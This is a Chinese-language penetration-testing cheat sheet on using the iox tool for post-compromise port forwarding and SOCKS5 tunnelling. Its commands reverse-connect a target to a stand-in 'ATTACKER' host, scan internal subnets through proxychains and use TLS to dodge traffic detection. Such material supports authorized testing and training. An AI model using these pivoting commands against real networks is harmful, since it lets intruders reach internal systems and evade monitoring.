wgpsec/iox-proxy

iox 端口转发与内网穿透

iox 是一个轻量级端口转发/代理工具——单个二进制文件，零依赖，支持正向/反向代理和 SOCKS5。在内网渗透中用于搭建流量隧道，让攻击机能访问目标内网服务。

项目地址：https://github.com/EddieIvan01/iox

核心概念

iox 有两个主要模式：

• fwd (forward)：端口转发——把一个端口的流量转到另一个地址
• proxy：SOCKS5 代理——创建代理让攻击机通过目标网络访问内网

每个模式都支持正向（目标监听）和反向（目标主动连接攻击机）两种连接方式。

端口转发 (fwd)

正向转发（目标端口 → 目标内网）

在目标机器上运行，把外部访问转到内网：

# 将目标 8888 端口转发到内网 10.0.0.2:3389
iox fwd -l 8888 -r 10.0.0.2:3389
# 攻击机访问 target:8888 就能连到 10.0.0.2:3389 (RDP)

反向转发（目标主动连出）

目标无法被直接访问时（有防火墙），让目标主动连接攻击机：

# 攻击机：监听两个端口
iox fwd -l 8888 -l 9999

# 目标机：连接攻击机，同时连接内网目标
iox fwd -r ATTACKER:8888 -r 10.0.0.2:3389

# 攻击机访问 localhost:9999 就能连到内网 10.0.0.2:3389

SOCKS5 代理 (proxy)

正向代理

在目标机器上启动 SOCKS5，攻击机通过目标代理访问内网：

# 目标机：启动 SOCKS5 代理
iox proxy -l 1080

# 攻击机：配置 proxychains
echo "socks5 TARGET 1080" >> /etc/proxychains.conf
proxychains nmap -sT 10.0.0.0/24

反向代理（最常用——目标出不了入站但能出站）

# 攻击机：监听等待连接
iox proxy -l 9999

# 目标机：反连攻击机
iox proxy -r ATTACKER:9999

# 攻击机通过 localhost:9999 使用 SOCKS5
proxychains nmap -sT 10.0.0.0/24

加密传输

# 使用 TLS 加密（避免流量特征检测）
iox fwd -l 8888 -r 10.0.0.2:3389 -k

# 反向也支持
iox proxy -r ATTACKER:9999 -k    # 目标
iox proxy -l 9999 -k              # 攻击机

实战场景

场景 1：RDP 内网穿透

# 目标已拿 shell，需要 RDP 到内网 10.0.0.2
# 攻击机
iox fwd -l 33890 -l 8888
# 目标机
iox fwd -r ATTACKER:8888 -r 10.0.0.2:3389
# 攻击机 RDP 连接
rdesktop localhost:33890

场景 2：多层内网穿透

# 第一层：已拿 DMZ 主机
iox proxy -l 1080                          # DMZ 上开 SOCKS5
# 第二层：通过 DMZ 代理访问内网主机
proxychains iox proxy -l 1081 -r 10.0.0.5  # 连到第二层

决策树

需要什么类型的隧道？
├─ 简单端口转发（一个端口映射到另一个）→ iox fwd
├─ SOCKS5 全代理（访问整个内网网段）→ iox proxy
├─ 目标有防火墙限制入站 → 反向模式（-r 代替 -l）
├─ 需要加密 → 加 -k 参数
├─ 需要持久化隧道/Web 管理面板 → frp / nps
└─ 只是临时转一个端口 → socat / ssh -L 也行